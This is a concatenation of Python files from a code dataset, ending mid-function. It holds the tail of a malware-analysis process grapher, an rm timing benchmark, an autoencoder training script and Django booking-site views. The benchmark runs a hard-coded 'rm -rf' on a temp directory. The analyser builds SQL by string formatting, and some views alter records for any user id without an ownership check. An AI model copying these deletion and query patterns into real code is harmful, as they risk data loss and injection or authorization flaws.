structure\n for key, value in self.edges.items():\n if not value['status'] is 'DELETE':\n output['links'].append(value)\n\n # change each link's source and target value to corresponding array index\n for link in output['links']:\n index = 0\n source = link['source']\n target = link['target']\n\n for node in output['nodes']:\n if node['id'] == source:\n link['source'] = index\n if node['id'] == target:\n link['target'] = index\n index += 1\n\n # write output to file in json format\n self.write_json_to_file(self.output_d3, output)\n\n def write_json_to_file(self, filename, data):\n \"\"\"write some data to file in json format\"\"\"\n with open(self.result_path + filename, 'wb') as out_file:\n out_file.write(json.dumps(data, indent=4))\n\n def query_pid_process_start(self):\n query = \"SELECT pid FROM `{table}` where procname = '{processname}' and operation = 'Process Start'\".format(\n table=self.tablename, processname=self.rootProcessname)\n rowcount, rows = self.query(query)\n return rows[0][0]\n\n def ask_for_process_name(self):\n pass\n\n def do_analyse(self):\n\n # select only first occurrence from 
malicious.exe\n self.root_pid = self.query_pid_process_start()\n\n self.get_all_created_processes_and_threads(self.root_pid)\n self.prepare_raw_data()\n self.link_data()\n self.cleanup_d3()\n self.write_d3()\n\n return True\n","sub_path":"malwrlyse/packages/modules/analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":20670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"122066652","text":"import numpy as np\nimport datetime\nimport os, sys, subprocess\nfrom glob import glob\n\nimport multiprocessing as mp\n\ndef touch(fpath, times=None):\n fhandle = open(fpath, 'a')\n try:\n os.utime(fpath, times)\n finally:\n fhandle.close()\n\ndef make_many_files(N_files=1000):\n\n # first, make many files\n tempdir = '/home/luke/temp/'\n if not os.path.exists(tempdir):\n os.mkdir(tempdir)\n\n fpaths = []\n for f in range(0,N_files):\n fpath = os.path.join(tempdir,str(f)+'.txt')\n touch(fpath)\n fpaths.append(fpath)\n\n return fpaths\n\ndef _touch_worker(task):\n f = task\n touch(f)\n\n\ndef parallel_make_many_files(N_files=1000, nworkers=16, maxworkertasks=1000):\n\n # first, make many files\n tempdir = '/home/luke/temp/'\n if not os.path.exists(tempdir):\n os.mkdir(tempdir)\n\n tasks = [os.path.join(tempdir,str(f)+'.txt') for f in range(0,N_files)]\n\n fpaths = tasks\n\n pool = mp.Pool(nworkers,maxtasksperchild=maxworkertasks)\n results = pool.map(_touch_worker, tasks)\n\n pool.close()\n pool.join()\n\n return fpaths\n\n\n\ndef chunks_generator(l, n):\n \"\"\"Yield successive n-sized chunks from l\"\"\"\n for i in range(0, len(l), n):\n max_ind = i+n\n if max_ind > len(l) -1:\n max_ind = len(l)\n yield l[i:max_ind], i, max_ind\n\n\ndef _rm_chunk_worker(task):\n # given a list of <~ 10,000 file names (and start/end inds for verbosity),\n # remove them.\n chunkfiles, i, max_ind = task\n\n fpathstr = ' '.join(chunkfiles)\n cmdtorun = 'rm {}'.format(fpathstr)\n subprocess.run(cmdtorun.split(' '))\n\n print('rm {} to {}...'.format(i, max_ind))\n\n return 1\n\n\ndef rm_named_files(filepaths, N_chunk=int(1e4), nworkers=1, maxworkertasks=1000):\n \"\"\"\n given a list of files, delete them.\n\n under the hood:\n * if you have <=1e4 files, does a simple long-form rm call.\n * if you have >1e4 files, splits the list of files into chunks, does\n multiple long-form rm calls.\n \"\"\"\n\n N_to_rm = len(filepaths)\n\n if not isinstance(filepaths,list):\n raise AssertionError\n\n if N_to_rm <= N_chunk:\n\n subprocess.run(['rm']+filepaths)\n\n print('called rm on {} files'.format(N_to_rm))\n\n elif N_to_rm > N_chunk and nworkers==1:\n\n for chunkfiles, i, max_ind in chunks_generator(filepaths, N_chunk):\n\n print('rm {} to {}...'.format(i, max_ind))\n\n fpathstr = ' '.join(chunkfiles)\n cmdtorun = 'rm {}'.format(fpathstr)\n subprocess.run(cmdtorun.split(' '))\n\n print('called rm on {} files'.format(N_to_rm))\n\n elif N_to_rm > N_chunk and nworkers > 1:\n\n # make a list of the chunks/sublists (these will be \"tasks\").\n tasks = []\n for chunkfiles, i, max_ind in chunks_generator(filepaths, N_chunk):\n tasks.append((chunkfiles, i, max_ind))\n\n pool = mp.Pool(nworkers,maxtasksperchild=maxworkertasks)\n results = pool.map(_rm_chunk_worker, tasks)\n\n pool.close()\n pool.join()\n\n print('called rm on {} files'.format(N_to_rm))\n\n return 1\n\n\ndef main():\n\n # make files, delete them individually by passing them all thru rm\n for N_files in list(map(int,[1e3,1e4,9.8e4])):\n\n # make files, delete them by directory removal\n fpaths = 
parallel_make_many_files(N_files=N_files)\n cmdtorun = 'rm -rf /home/luke/temp'\n t0 = datetime.datetime.now()\n returncode = os.system(cmdtorun)\n t1 = datetime.datetime.now()\n tdelt = (t1-t0).total_seconds()\n print('rm -rf directory, {} files: {} seconds'.format(N_files, tdelt))\n\n # make files, delete them individually by passing them all thru rm\n nworkers = 1\n fpaths = parallel_make_many_files(N_files=N_files)\n t0 = datetime.datetime.now()\n rm_named_files(fpaths, N_chunk=int(2e4), nworkers=nworkers)\n t1 = datetime.datetime.now()\n tdelt = (t1-t0).total_seconds()\n print('rm INDIVIDUAL files {} worker, {} files: {} seconds'.\n format(nworkers, N_files, tdelt))\n\n # same but multithread\n nworkers = 16\n fpaths = parallel_make_many_files(N_files=N_files)\n t0 = datetime.datetime.now()\n rm_named_files(fpaths, N_chunk=int(2e4), nworkers=nworkers)\n t1 = datetime.datetime.now()\n tdelt = (t1-t0).total_seconds()\n print('rm INDIVIDUAL files {} workers, {} files: {} seconds'.\n format(nworkers, N_files, tdelt))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"rm_timing_experiments/removal_calls.py","file_name":"removal_calls.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"397683587","text":"import argparse\nimport json\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport logger\nfrom image_folder import ImageFolder720p\nfrom models.cae_32x32x32_zero_pad_bin import CAE\nfrom utils import save_imgs\n\n\ndef train(cfg):\n\tos.makedirs(f\"out/{cfg['exp_name']}\", exist_ok=True)\n\tos.makedirs(f\"checkpoints/{cfg['exp_name']}\", exist_ok=True)\n\n\t# dump config for current experiment\n\twith open(f\"checkpoints/{cfg['exp_name']}/setup.cfg\", \"wt\") as f:\n\t\tfor k, v in cfg.items():\n\t\t\tf.write(\"%15s: %s\\n\" % (k, v))\n\n\tmodel = CAE().cuda()\n\n\tif cfg['load']:\n\t\tmodel.load_state_dict(torch.load(cfg['chkpt']))\n\t\tlogger.info(\"Loaded model from\", cfg['chkpt'])\n\n\tmodel.train()\n\tlogger.info(\"Done setup model\")\n\n\tdataset = ImageFolder720p(cfg['dataset_path'])\n\tdataloader = DataLoader(\n\t\tdataset, batch_size=cfg['batch_size'], shuffle=cfg['shuffle'], num_workers=cfg['num_workers']\n\t)\n\tlogger.info(f\"Done setup dataloader: {len(dataloader)} batches of size {cfg['batch_size']}\")\n\n\tmse_loss = nn.MSELoss()\n\tadam = torch.optim.Adam(model.parameters(), lr=cfg['learning_rate'], weight_decay=1e-5)\n\tsgd = torch.optim.SGD(model.parameters(), lr=cfg['learning_rate'])\n\n\toptimizer = adam\n\n\tra = 0\n\n\tfor ei in range(cfg['resume_epoch'], cfg['num_epochs']):\n\t\tfor bi, (img, patches, _) in enumerate(dataloader):\n\n\t\t\tavg_loss = 0\n\t\t\tfor i in range(6):\n\t\t\t\tfor j in range(10):\n\t\t\t\t\tx = Variable(patches[:, :, i, j, :, :]).cuda()\n\t\t\t\t\ty = model(x)\n\t\t\t\t\tloss = mse_loss(y, x)\n\n\t\t\t\t\tavg_loss += (1 / 60) * loss.item()\n\n\t\t\t\t\toptimizer.zero_grad()\n\t\t\t\t\tloss.backward()\n\t\t\t\t\toptimizer.step()\n\n\t\t\tra = avg_loss if bi == 0 else ra * bi / (bi + 1) + avg_loss / (bi + 1)\n\n\t\t\tlogger.debug(\n\t\t\t\t'[%3d/%3d][%5d/%5d] avg_loss: %f, ra: %f' %\n\t\t\t\t(ei + 1, cfg['num_epochs'], bi + 1, len(dataloader), avg_loss, ra)\n\t\t\t)\n\n\t\t\t# save img\n\t\t\tif bi % cfg['out_every'] == 0:\n\t\t\t\tout = torch.zeros(6, 10, 3, 128, 128)\n\t\t\t\tfor i in range(6):\n\t\t\t\t\tfor j in 
range(10):\n\t\t\t\t\t\tx = Variable(patches[0, :, i, j, :, :].unsqueeze(0)).cuda()\n\t\t\t\t\t\tout[i, j] = model(x).cpu().data\n\n\t\t\t\tout = np.transpose(out, (0, 3, 1, 4, 2))\n\t\t\t\tout = np.reshape(out, (768, 1280, 3))\n\t\t\t\tout = np.transpose(out, (2, 0, 1))\n\n\t\t\t\ty = torch.cat((img[0], out), dim=2).unsqueeze(0)\n\t\t\t\tsave_imgs(imgs=y, to_size=(3, 768, 2 * 1280), name=f\"out/{cfg['exp_name']}/out_{ei}_{bi}.png\")\n\n\t\t\t# save model\n\t\t\tif bi % cfg['save_every'] == cfg['save_every'] - 1:\n\t\t\t\ttorch.save(model.state_dict(), f\"checkpoints/{cfg['exp_name']}/model_{ei}_{bi}.state\")\n\n\t# save final model\n\ttorch.save(model.state_dict(), f\"checkpoints/{cfg['exp_name']}/model_final.state\")\n\n\ndef main(args):\n\ttrain(cfg=json.load(open(args.cfg, \"rt\")))\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--cfg', type=str, required=True)\n\tmain(parser.parse_args())\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"649689856","text":"#MOONBAY\n# Create your views here.\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import User\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom book.forms import UserForm, ProfessionalsForm, RecruitersForm, GPForm, HDForm,OHForm, SpecialtiesForm, SpecialistForm, PostForm, DateForm, ShortPostForm, LongPostForm, LoginForm\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views import generic\nfrom django.views.generic import View\nfrom book.models import User, Professionals, Recruiters, Specialties, Specialists, Post, Date, Taken_Post\nfrom django.forms import formset_factory\nfrom django.shortcuts import get_object_or_404, get_list_or_404\nfrom django.http import JsonResponse\n\ndef index(request):\n\tposts_list = Date.objects.filter(is_taken=False).select_related('post')\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\nclass UserRegistration(View):\n\tuserform = UserForm\n\tprofessionalsform = ProfessionalsForm\n\trecruitersform = RecruitersForm\n\tohform = OHForm\n\thdform = HDForm\n\tspecialtiesform = SpecialtiesForm\n\tspecialistform = SpecialistForm\n\n\t# display blank form\n\tdef get(self, request):\n\t\tuserform = self.userform(None)\n\t\tprofessionalsform = self.professionalsform(None)\n\t\trecruitersform = self.recruitersform(None)\n\t\tohform = self.ohform(None)\n\t\thdform = self.hdform(None)\n\t\tspecialtiesform = self.specialtiesform(None)\n\t\tspecialistform = self.specialistform(None)\n\t\treturn render(request, 'book/form2.html', {'userform': userform, 'professionalsform': professionalsform, 'recruitersform': recruitersform, 'hdform': hdform, 'ohform': ohform,'specialtiesform': specialtiesform, 'specialistform': specialistform})\n\n\t# process form data\n\tdef post(self, request):\n\t\tuserform = self.userform(request.POST) \n\t\tprofessionalsform = self.professionalsform(request.POST)\n\t\trecruitersform = self.recruitersform(request.POST)\n\t\thdform = self.hdform(request.POST)\n\t\tohform = self.ohform(request.POST)\n\t\tspecialtiesform 
= self.specialtiesform(request.POST)\n\t\tspecialistform = self.specialistform(request.POST)\n\t\t\n\t\t# validate\n\t\tuser_valid = userform.is_valid()\n\t\tprofessional_valid = professionalsform.is_valid()\n\t\trecruiter_valid = recruitersform.is_valid()\n\t\thd_valid = hdform.is_valid()\n\t\toh_valid = ohform.is_valid()\n\t\tspecialty_valid = specialtiesform.is_valid()\n\t\tspecialist_valid = specialistform.is_valid()\n\n\t\tif user_valid:\n\t\t\tuser = userform.save(commit=False)\n\t\t\temail = userform.cleaned_data['email']\n\t\t\tpassword = userform.cleaned_data['password']\n\t\t\tuser.set_password(password)\n\t\t\tuser.save()\n\n\t\t\tuser = authenticate(request, email=email, password=password)\n\n\t\t\tif professional_valid:\n\t\t\t\tprofessional = professionalsform.save(commit=False)\n\t\t\t\tprofessional.cancellations = 0\n\t\t\t\tprofessional.bookings = 0\n\t\t\t\tprofessional.professional_user_id = user\n\t\t\t\tprofessional.save()\n\t\n\t\t\t\tif hd_valid is not None and user.profession == \"Doctor\":\n\t\t\t\t\thd = hdform.save(commit=False)\n\t\t\t\t\thd.hd_license_number = professional\n\t\t\t\t\thd.save()\n\t\t\t\t\n\t\t\t\tif oh_valid is not None and user.profession == \"Doctor\":\n\t\t\t\t\toh = ohform.save(commit=False)\n\t\t\t\t\toh.oh_license_number = professional\n\t\t\t\t\toh.save()\n\n\t\t\t\tif specialty_valid:\n\t\t\t\t\tspecialty = specialtiesform.save(commit=False)\n\t\t\t\t\tspecialty.save()\n\n\t\t\t\t\tif specialist_valid:\n\t\t\t\t\t\tspecialist = specialistform.save(commit=False)\n\t\t\t\t\t\tspecialist.license_number = professional\n\t\t\t\t\t\tspecialist.specialty = specialty\n\t\t\t\t\t\tspecialist.save()\n\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('post_list')\n\t\t\t\t\n\t\t\tif recruiter_valid:\n\t\t\t\trecruiter = recruitersform.save(commit=False)\n\t\t\t\trecruiter.recruiter_user_id = user\n\t\t\t\trecruiter.save()\n\t\t\t\t\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('post_list')\n\n\t\treturn render(request, 'book/form2.html', {'userform': userform, 'professionalsform': professionalsform, 'recruitersform': recruitersform, 'hdform': hdform, 'ohform': ohform,'specialtiesform': specialtiesform, 'specialistform': specialistform})\n\nclass login_view(View):\n\tloginform = LoginForm\n\n\tdef get(self,request):\n\t\tloginform = self.loginform(None)\n\t\treturn render(request, 'book/login.html', {'loginform':loginform})\n\n\tdef post(self,request):\n\t\tloginform = self.loginform(request.POST)\n\n\t\tlogin_valid = loginform.is_valid()\n\n\t\tif login_valid:\n\t\t\temail = loginform.cleaned_data['email']\n\t\t\tpassword = loginform.cleaned_data['password']\n\n\t\t\tuser = authenticate(request, email=email, password=password)\n\n\t\t\tif user is not None:\n\t\t\t\tlogin(request,user)\n\t\t\t\t\n\t\t\t\treturn redirect('post_list')\n\n\t\treturn render(request, 'book/login.html', {'loginform':loginform})\n\ndef logout_view(request):\n\tlogout(request)\n\treturn redirect('login')\n\ndef create_post(request, method=\"POST\"):\n\tShortPostFormSet = formset_factory(ShortPostForm, extra=2, max_num=10, can_delete=True)\n\tLongPostFormSet = formset_factory(LongPostForm, extra=2, max_num=10, can_delete=True)\n\tif request.method == \"GET\":\n\t\tpost_form = PostForm(request.GET or None)\n\t\tshortformset = ShortPostFormSet(request.GET or None, prefix='short')\n\t\tlongformset = LongPostFormSet(request.GET or None, prefix='long')\n\telif request.method == \"POST\":\n\t\tpost_form = PostForm(request.POST)\n\t\tshortformset = 
ShortPostFormSet(request.POST, prefix='short')\n\t\tlongformset = LongPostFormSet(request.POST, prefix='long')\n\n\t\tif post_form.is_valid():\n\t\t\tpost = post_form.save()\n\n\t\t\tif shortformset.is_valid():\n\t\t\t\tfor form in shortformset:\n\t\t\t\t\tselector = form.cleaned_data['selector']\n\t\t\t\t\tmale_total = form.cleaned_data['male_number']\n\t\t\t\t\tfemale_total = form.cleaned_data['female_number']\n\t\t\t\t\tstart_date = form.cleaned_data['start_date']\n\t\t\t\t\tend_date = form.cleaned_data['end_date']\n\t\t\t\t\tstart_time = form.cleaned_data['start_time']\n\t\t\t\t\tend_time = form.cleaned_data['end_time']\n\t\t\t\t\ttotal_hours = form.cleaned_data['total_hours']\n\t\t\t\t\tsalary = form.cleaned_data['salary']\n\t\t\t\t\tnet_rate = form.cleaned_data['net_rate']\n\t\t\t\t\tx = 0\n\t\t\t\t\ty = 0\n\t\t\t\t\tz = 0 \n\t\t\t\t\tif selector == \"OR\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\n\t\t\t\t\t\twhile x < male_total:\n\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\tsex_of_professional = \"Male/Female\",\n\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\tstart_time = start_time,\n\t\t\t\t\t\t\t\tend_time = end_time,\n\t\t\t\t\t\t\t\ttotal_hours = total_hours,\n\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\tnet_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\tx += 1\n\t\t\t\t\t\treturn redirect('post_list')\n\n\t\t\t\t\telif selector == \"AND\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\t#iterate thru male then create a post\n\n\t\t\t\t\t\t#e.g. 
male total = 5\n\t\t\t\t\t\tif male_total != 0:\n\t\t\t\t\t\t\twhile z < male_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Male\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\tstart_time = start_time,\n\t\t\t\t\t\t\t\t\tend_time = end_time,\n\t\t\t\t\t\t\t\t\ttotal_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\tnet_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\tz += 1\n\n\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\tif female_total != 0:\n\t\t\t\t\t\t\twhile y < female_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Female\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\tstart_time = start_time,\n\t\t\t\t\t\t\t\t\tend_time = end_time,\n\t\t\t\t\t\t\t\t\ttotal_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\tnet_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\ty += 1\n\t\t\t\t\treturn redirect('post_list')\n\n\t\t\telif longformset.is_valid():\n\t\t\t\tfor form in longformset:\n\t\t\t\t\tselector = form.cleaned_data['selector']\n\t\t\t\t\tmale_total = form.cleaned_data['male_number']\n\t\t\t\t\tfemale_total = form.cleaned_data['female_number']\n\t\t\t\t\tstart_date = form.cleaned_data['start_date']\n\t\t\t\t\tend_date = form.cleaned_data['end_date']\n\t\t\t\t\t#start_time = form.cleaned_data['start_time']\n\t\t\t\t\t#end_time = form.cleaned_data['end_time']\n\t\t\t\t\t#total_hours = form.cleaned_data['total_hours']\n\t\t\t\t\tsalary = form.cleaned_data['salary']\n\t\t\t\t\t#net_rate = form.cleaned_data['net_rate']\n\t\t\t\t\tx = 0\n\t\t\t\t\ty = 0\n\t\t\t\t\tz = 0 \n\n\t\t\t\t\tif selector == \"OR\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\n\t\t\t\t\t\twhile x < male_total:\n\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\tsex_of_professional = \"Male/Female\",\n\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t#start_time = start_time,\n\t\t\t\t\t\t\t\t#end_time = end_time,\n\t\t\t\t\t\t\t\t#total_hours = total_hours,\n\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t#net_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\tx += 1\n\t\t\t\t\t\t#return redirect('post_list')\n\n\t\t\t\t\telif selector == \"AND\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\t#iterate thru male then create a post\n\n\t\t\t\t\t#e.g. 
male total = 5\n\t\t\t\t\t\tif male_total != 0:\n\t\t\t\t\t\t\twhile z < male_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Male\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\t#start_time = start_time,\n\t\t\t\t\t\t\t\t\t#end_time = end_time,\n\t\t\t\t\t\t\t\t\t#total_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\t#net_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\tz += 1\n\n\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\tif female_total != 0:\n\t\t\t\t\t\t\twhile y < female_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Female\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\t#start_time = start_time,\n\t\t\t\t\t\t\t\t\t#end_time = end_time,\n\t\t\t\t\t\t\t\t\t#total_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\t#net_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\ty += 1\n\t\t\t\treturn redirect('post_list')\n\n\n\t\t\t#return render(request, 'book/success.html', )\n\treturn render(request, 'book/create_post.html', {'shortformset': shortformset, 'longformset': longformset, 'post_form': post_form,})\n\ndef load_posts(request, method=\"POST\"):\n\n# get the word from where textbox on keydown\n\tif request.method == \"POST\":\n\t\tif request.POST.get('request') == '1':\n\t\t\tterm = request.POST.get('search')\n\t\t\tposts = Post.objects.filter(string__contains=term)\n\t\t\t\n\t\t\tresults = []\n\t\t\t\n\t\t\tfor r in posts:\n\t\t\t\trow_result = {}\n\t\t\t\trow_result[\"value\"] = r.post_id\n\t\t\t\trow_result[\"label\"] = r.where\n\t\t\t\tresults.append(row_result)\n\n\t\t\treturn JsonResponse(results, safe=False)\n\n\t\telif request.POST.get('request') == '2':\n\t\t\tuserid = request.POST.get('userid')\n\t\t\tpost_details = Post.objects.filter(id=userid)\n\t\t\tuser_array = []\n\n\t\t\tfor q in post_details:\n\t\t\t\tresult = {}\n\t\t\t\t#user_id = q['post_id']\n\t\t\t\tresult[\"user_id\"] = q.post_id\n\t\t\t\tresult[\"profession\"] = q.profession\n\n\t\t\t\tresult[\"qualification\"] = q.qualification\n\t\t\t\tresult[\"pay_given\"] = q.pay_given\n\t\t\t\tresult[\"incentives\"] = q.incentives\n\t\t\t\tresult[\"incentives_given\"] = q.incentives_given\n\t\t\t\tresult[\"requirements\"] = q.requirements\n\t\t\t\tresult[\"expected_number_patients\"] = q.expected_number_patients\n\t\t\t\tresult[\"toxicity\"] = q.toxicity\n\t\t\t\tresult[\"person_to_look_for\"] = q.person_to_look_for\n\n\t\t\t\t#user_array[] = [\"user_id\": user_id, \"profession\": profession, \"qualification\": qualification, \"pay_given\": pay_given, \"incentives\": incentives, \"incentives_given\": incentives_given, \"requirements\": requirements, \"expected_number_patients\": expected_number_patients, \"toxicity\": toxicity, \"person_to_look_for\": person_to_look_for]\n\t\t\t\tuser_array.append(result)\n\n\t\t\treturn JsonResponse(user_array, safe=False)\n\n\telse:\n\t\tdata = 'fail'\n\t\tmimetype = 'application/json'\n\n\treturn HttpResponse(data, mimetype)\n\ndef post_list(request):\n\t#error_message = \"Currently, there are no posts.\"\n\t#posts_list = Date.objects.filter(is_taken=False).select_related('post')\n\tposts_list = 
Date.objects.filter(is_taken=False).select_related('post').order_by('start_date')\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\ndef post_details(request, post_id, date_id):\n\tpass\n\t# get the post details\n\t# get the date details\n\t# pass them into details page\n\t\ndef take_post(request, user_id, date_id):\n\tuser = get_object_or_404(User, pk=user_id)\n\tdate_taken = get_object_or_404(Date, pk=date_id)\n\tpost_taken = get_object_or_404(Post, date__pk=date_id)\n\tdate_taken.is_taken = True\n\tdate_taken.save()\n\n\tnew_post_taken = Taken_Post(\n\t\tpost = post_taken,\n\t\tdate = date_taken,\n\t\ttaker = user\n\t\t)\n\tnew_post_taken.save()\n\n\treturn redirect('profile', user_id=user.pk)\n\ndef cancel_post(request, user_id, date_id):\n\tuser = get_object_or_404(User, pk=user_id)\n\tdate_taken = get_object_or_404(Date, pk=date_id)\n\tdate_taken.is_taken = False\n\tdate_taken.save()\n\t#SOMETHING WRONG WITH THE FF CODE MAYBE USE WHERE DATE ID IS AND USER ID IS\n\trelated_post = Taken_Post.objects.filter(date__id=date_id)\n\t#related_post = get_object_or_404(Taken_Post, date__id=date_id)\n\trelated_post.delete()\n\t#delete or UPTDATE the taken post ===> DOES NOT SEEM TO WORK\n\n\treturn redirect('profile', user_id=user.pk)\n\ndef profile(request, user_id):\n\t#error_message = \"You haven't taken any posts.\"\n\tmy_posts = Taken_Post.objects.filter(taker=user_id).select_related('date','post').exclude(date__is_taken=False)\n\treturn render(request, 'book/profile.html', {'my_posts': my_posts, 'error_message':\"You haven't taken any posts.\",})\n\n\ndef message_recruiter(request):\n\t#if post is taken or not\n\t#if taker cancelled\n\tpass\n\ndef populate_textboxes(request):\n\tif request.method == \"POST\":\n\t\twhere = request.POST.get('where', None)\n\telse:\n\t\twhere = ''\n\n\t#REMOVE DUPLICATES\n\tsimilar_posts = Post.objects.filter(where__icontains=where)\n\t#return json list of posts\n\treturn render(request, 'book/ajax_search.html', {'posts':similar_posts,})\n\ndef complete_fields(request):\n\tif request.method == \"POST\":\n\t\tpost_id = request.POST.get('post_id', None)\n\telse:\n\t\tpost_id = ''\n\n\tpost = get_object_or_404(Post, pk=post_id)\n\t\n\tpost_details = {\n\t\t\"profession\": post.profession,\n\t\t\"setting\": post.setting,\n\t\t\"pay_given\": post.pay_given,\n\t\t\"incentives\": post.incentives,\n\t\t\"incentives_given\": post.incentives_given,\n\t\t\"requirements\": post.requirements,\n\t\t\"expected_number_patients\": post.expected_number_patients,\n\t\t\"person_to_look_for\":post.person_to_look_for,\n\t\t\"person_to_relieve\":post.person_to_relieve,\n\t\t\"others\": post.others\n\t};\n\n\treturn JsonResponse(post_details)\n\ndef sort_post(request, method=\"POST\"):\n\t#GET THE ID OF THE POSTS\n\terror_message = \"Currently, there are no posts.\"\n\n\tif request.method == \"POST\":\n\t\tchosen_category = request.POST.get('chosen_category')\n\t\tdates = request.POST.getlist('date_array[]')\n\n\t\tdate_array = Date.objects.filter(id__in=dates)\n\n\t\t'''for x in dates:\n\t\t\tdate = Date.objects.get(pk=x)\n\t\t\tdate_array.append(date)'''\n\n\t\tif chosen_category == \"date\":\n\t\t\tposts_list = date_array.filter(is_taken=False).select_related('post').order_by('start_date')\n\t\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('start_date')\n\n\t\telif chosen_category == \"net_rate\":\n\t\t\tposts_list = 
date_array.filter(is_taken=False).select_related('post').order_by('-net_rate')\n\t\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('-net_rate')\n\n\t\telif chosen_category == \"location\":\n\t\t\t#use posts_list = Date.objects.filter(post__where__contains = location)\n\t\t\tposts_list = date_array.filter(is_taken=False).select_related('post').order_by('post__where')\n\t\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('post__where')\n\n\telse:\n\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('-start_date')\n\t\tposts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('start_date')\n\t\treturn render(request, 'book/posts.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\n\t'''posts_list = Date.objects.filter(post__id=post_id).filter(is_taken=False)\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\t'''\n\treturn render(request, 'book/posts.html', {'posts_list': posts_list, 'error_message':error_message,})\n\ndef search_post(request, method=\"POST\"):\n\tif request.method == \"POST\":\n\t\twhere = 